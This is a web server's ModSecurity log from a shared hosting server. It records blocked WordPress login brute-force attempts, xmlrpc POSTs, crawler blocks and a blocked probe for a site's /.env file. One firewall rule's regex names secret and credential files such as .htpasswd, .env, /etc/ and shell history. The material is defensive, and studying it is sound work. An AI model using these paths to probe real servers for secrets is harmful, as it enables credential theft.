[Tue May 26 16:05:01.845554 2026] [security2:error] [pid 762634:tid 762890] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Vbx8rj1VZMqUAOeK_AAAAH4"]
[Tue May 26 16:05:02.286063 2026] [security2:error] [pid 762634:tid 762830] [client 141.164.80.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV3Vrx8rj1VZMqUAOeLEgAAAEI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1231675&moderation-hash=b9f3913f537919d09439896dc0e6dc48
[Tue May 26 16:05:03.968011 2026] [fcgid:warn] [pid 762634:tid 762890] (70014)End of file found: [client 45.56.79.53:57991] mod_fcgid: can't get data from http client
[Tue May 26 16:05:04.103054 2026] [security2:error] [pid 762634:tid 762775] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3V7x8rj1VZMqUAOeLMwAAAAs"]
[Tue May 26 16:05:04.448726 2026] [security2:error] [pid 762634:tid 762878] [client 44.192.42.196:8390] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.hotsalesretail.com"] [uri "/index.php"] [unique_id "ahV3WLx8rj1VZMqUAOeLSAAAcjw"]
[Tue May 26 16:05:04.817486 2026] [security2:error] [pid 762634:tid 762795] [client 44.192.42.196:8390] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.hotsalesretail.com"] [uri "/index.php"] [unique_id "ahV3WLx8rj1VZMqUAOeLTwAAHz4"]
[Tue May 26 16:05:05.290415 2026] [http2:info] [pid 773493:tid 773493] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 16:05:05.409720 2026] [security2:error] [pid 762634:tid 762711] [remote 41.111.171.131:46168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.171.111.41.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV3Wbx8rj1VZMqUAOeLaAAATkw"]
[Tue May 26 16:05:05.905506 2026] [security2:error] [pid 773493:tid 773634] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3WZgy-Vk4jSdqTCQsKQAAAJA"]
[Tue May 26 16:05:07.822143 2026] [security2:error] [pid 773493:tid 773637] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3W5gy-Vk4jSdqTCQsawAAAJM"]
[Tue May 26 16:05:08.142918 2026] [security2:error] [pid 773493:tid 773661] [client 106.219.85.83:22417] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3XJgy-Vk4jSdqTCQsgwAAAKs"]
[Tue May 26 16:05:08.143137 2026] [security2:error] [pid 773493:tid 773661] [client 106.219.85.83:22417] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3XJgy-Vk4jSdqTCQsgwAAAKs"]
[Tue May 26 16:05:08.941606 2026] [security2:error] [pid 773493:tid 773502] [remote 95.216.117.13:39998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahV3XJgy-Vk4jSdqTCQsnwAA4Ag"]
[Tue May 26 16:05:09.292343 2026] [security2:error] [pid 773493:tid 773677] [client 103.44.52.196:41216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3XZgy-Vk4jSdqTCQsqQAAALs"]
[Tue May 26 16:05:09.292562 2026] [security2:error] [pid 773493:tid 773677] [client 103.44.52.196:41216] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3XZgy-Vk4jSdqTCQsqQAAALs"]
[Tue May 26 16:05:10.093066 2026] [security2:error] [pid 773493:tid 773631] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3XZgy-Vk4jSdqTCQstgAAAI0"]
[Tue May 26 16:05:10.585959 2026] [security2:error] [pid 773493:tid 773676] [client 143.244.49.23:56795] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env"] [unique_id "ahV3Xpgy-Vk4jSdqTCQsyQAAALo"]
[Tue May 26 16:05:12.162567 2026] [security2:error] [pid 773493:tid 773634] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3X5gy-Vk4jSdqTCQs7AAAAJA"]
[Tue May 26 16:05:12.976654 2026] [security2:error] [pid 773493:tid 773618] [remote 154.66.198.148:6122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahV3YJgy-Vk4jSdqTCQtAwAAv3w"]
[Tue May 26 16:05:13.673793 2026] [security2:error] [pid 773493:tid 773683] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3YZgy-Vk4jSdqTCQtDwAAAME"]
[Tue May 26 16:05:14.785424 2026] [security2:error] [pid 773493:tid 773521] [remote 209.42.20.53:36024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahV3Ypgy-Vk4jSdqTCQtLQAAnBs"]
[Tue May 26 16:05:15.395129 2026] [security2:error] [pid 773493:tid 773685] [client 47.237.4.203:45588] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "162.222.227.191"] [uri "/index.html"] [unique_id "ahV3Y5gy-Vk4jSdqTCQtSAAAAMM"]
[Tue May 26 16:05:15.526318 2026] [security2:error] [pid 773493:tid 773518] [remote 216.185.214.209:40668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV3Y5gy-Vk4jSdqTCQtQgAAvxg"]
[Tue May 26 16:05:16.152932 2026] [security2:error] [pid 773493:tid 773683] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Y5gy-Vk4jSdqTCQtUgAAAME"]
[Tue May 26 16:05:17.433116 2026] [security2:error] [pid 773493:tid 773640] [client 113.168.27.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3ZJgy-Vk4jSdqTCQtcQAAAJY"]
[Tue May 26 16:05:17.669950 2026] [security2:error] [pid 773493:tid 773650] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3ZZgy-Vk4jSdqTCQtfQAAAKA"]
[Tue May 26 16:05:17.745123 2026] [security2:error] [pid 773493:tid 773688] [client 85.208.96.211:54604] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-2-6/day/2023-08-14/"] [unique_id "ahV3ZZgy-Vk4jSdqTCQthwAAAMY"]
[Tue May 26 16:05:17.745217 2026] [security2:error] [pid 773493:tid 773688] [client 85.208.96.211:54604] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-2-6/day/2023-08-14/"] [unique_id "ahV3ZZgy-Vk4jSdqTCQthwAAAMY"]
[Tue May 26 16:05:18.941851 2026] [security2:error] [pid 773493:tid 773693] [client 106.219.85.83:10159] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Zpgy-Vk4jSdqTCQtngAAAMs"]
[Tue May 26 16:05:18.942004 2026] [security2:error] [pid 773493:tid 773693] [client 106.219.85.83:10159] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Zpgy-Vk4jSdqTCQtngAAAMs"]
[Tue May 26 16:05:19.672918 2026] [security2:error] [pid 773493:tid 773677] [client 103.44.52.196:38000] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Z5gy-Vk4jSdqTCQttwAAALs"]
[Tue May 26 16:05:19.673025 2026] [security2:error] [pid 773493:tid 773677] [client 103.44.52.196:38000] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Z5gy-Vk4jSdqTCQttwAAALs"]
[Tue May 26 16:05:19.746573 2026] [security2:error] [pid 773493:tid 773719] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Z5gy-Vk4jSdqTCQtswAAAOU"]
[Tue May 26 16:05:22.323981 2026] [security2:error] [pid 773493:tid 773663] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3aZgy-Vk4jSdqTCQt8AAAAK0"]
[Tue May 26 16:05:22.899138 2026] [security2:error] [pid 773493:tid 773548] [remote 185.230.216.227:34868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.216.230.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV3apgy-Vk4jSdqTCQuAQAAkjY"]
[Tue May 26 16:05:24.505833 2026] [security2:error] [pid 773493:tid 773744] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3bJgy-Vk4jSdqTCQuKwAAAP4"]
[Tue May 26 16:05:25.010285 2026] [security2:error] [pid 773493:tid 773684] [client 114.119.128.127:39889] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV3bZgy-Vk4jSdqTCQuRwAAAMI"], referer: http://glorodavionics.com/beta/index.php?route=product%2Fmanufacturer%2Finfo&manufacturer_id=11&page=3
[Tue May 26 16:05:26.613572 2026] [security2:error] [pid 773493:tid 773623] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3bpgy-Vk4jSdqTCQucAAAAIU"]
[Tue May 26 16:05:27.666271 2026] [security2:error] [pid 773493:tid 773683] [client 47.128.40.246:46666] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mail.ameritradeng.com"] [uri "/robots.txt"] [unique_id "ahV3b5gy-Vk4jSdqTCQumwAAAME"]
[Tue May 26 16:05:28.564852 2026] [security2:error] [pid 773493:tid 773685] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3cJgy-Vk4jSdqTCQupwAAAMM"]
[Tue May 26 16:05:29.316750 2026] [security2:error] [pid 773493:tid 773651] [client 106.219.85.83:4246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3cZgy-Vk4jSdqTCQuwAAAAKE"]
[Tue May 26 16:05:29.316862 2026] [security2:error] [pid 773493:tid 773651] [client 106.219.85.83:4246] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3cZgy-Vk4jSdqTCQuwAAAAKE"]
[Tue May 26 16:05:30.191618 2026] [security2:error] [pid 773493:tid 773648] [client 103.44.52.196:47544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3cpgy-Vk4jSdqTCQu2wAAAJ4"]
[Tue May 26 16:05:30.191770 2026] [security2:error] [pid 773493:tid 773648] [client 103.44.52.196:47544] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3cpgy-Vk4jSdqTCQu2wAAAJ4"]
[Tue May 26 16:05:30.516353 2026] [security2:error] [pid 773493:tid 773708] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3cpgy-Vk4jSdqTCQu2gAAANo"]
[Tue May 26 16:05:32.061187 2026] [security2:error] [pid 773493:tid 773637] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3c5gy-Vk4jSdqTCQvJgAAAJM"]
[Tue May 26 16:05:34.700634 2026] [security2:error] [pid 773493:tid 773629] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3dpgy-Vk4jSdqTCQvXgAAAIs"]
[Tue May 26 16:05:36.899543 2026] [security2:error] [pid 773493:tid 773702] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3eJgy-Vk4jSdqTCQvmAAAANQ"]
[Tue May 26 16:05:37.579962 2026] [security2:error] [pid 773493:tid 773659] [client 114.119.134.127:45685] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.plenitudotonal.com"] [uri "/nueva/wp-content/gallery/sede/thumbs/thumbs_hab-02.jpg"] [unique_id "ahV3eZgy-Vk4jSdqTCQvwAAAAKk"], referer: https://www.plenitudotonal.com/nueva/wp-content/gallery/sede/thumbs/thumbs_hab-02.jpg
[Tue May 26 16:05:38.825713 2026] [security2:error] [pid 773493:tid 773694] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3epgy-Vk4jSdqTCQv2gAAAMw"]
[Tue May 26 16:05:39.213559 2026] [security2:error] [pid 773493:tid 773620] [remote 95.216.117.13:32994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahV3e5gy-Vk4jSdqTCQv7QAA8X4"]
[Tue May 26 16:05:39.967217 2026] [security2:error] [pid 773493:tid 773725] [client 106.219.85.83:12248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3e5gy-Vk4jSdqTCQwAwAAAOs"]
[Tue May 26 16:05:39.967374 2026] [security2:error] [pid 773493:tid 773725] [client 106.219.85.83:12248] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3e5gy-Vk4jSdqTCQwAwAAAOs"]
[Tue May 26 16:05:40.310305 2026] [security2:error] [pid 773493:tid 773748] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3e5gy-Vk4jSdqTCQv_gAAAQI"]
[Tue May 26 16:05:41.850886 2026] [security2:error] [pid 773493:tid 773736] [client 103.44.52.196:60662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3fZgy-Vk4jSdqTCQwQAAAAPY"]
[Tue May 26 16:05:41.851004 2026] [security2:error] [pid 773493:tid 773736] [client 103.44.52.196:60662] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3fZgy-Vk4jSdqTCQwQAAAAPY"]
[Tue May 26 16:05:42.973570 2026] [security2:error] [pid 773493:tid 773739] [client 123.25.106.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3fpgy-Vk4jSdqTCQwUgAAAPk"]
[Tue May 26 16:05:42.999780 2026] [security2:error] [pid 773493:tid 773691] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3fpgy-Vk4jSdqTCQwVwAAAMk"]
[Tue May 26 16:05:44.330065 2026] [security2:error] [pid 773493:tid 773652] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3f5gy-Vk4jSdqTCQwgQAAAKI"]
[Tue May 26 16:05:47.068335 2026] [security2:error] [pid 773493:tid 773638] [client 66.249.70.141:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahV3g5gy-Vk4jSdqTCQw2wAAAJQ"]
[Tue May 26 16:05:47.224390 2026] [security2:error] [pid 773493:tid 773710] [client 66.249.70.140:36390] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahV3g5gy-Vk4jSdqTCQw4wAAANw"]
[Tue May 26 16:05:47.508427 2026] [security2:error] [pid 773493:tid 773730] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3g5gy-Vk4jSdqTCQw3gAAAPA"]
[Tue May 26 16:05:48.171812 2026] [security2:error] [pid 773493:tid 773550] [remote 94.76.235.103:34112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV3g5gy-Vk4jSdqTCQw9gAAujg"]
[Tue May 26 16:05:49.059042 2026] [security2:error] [pid 773493:tid 773660] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3hJgy-Vk4jSdqTCQxDQAAAKo"]
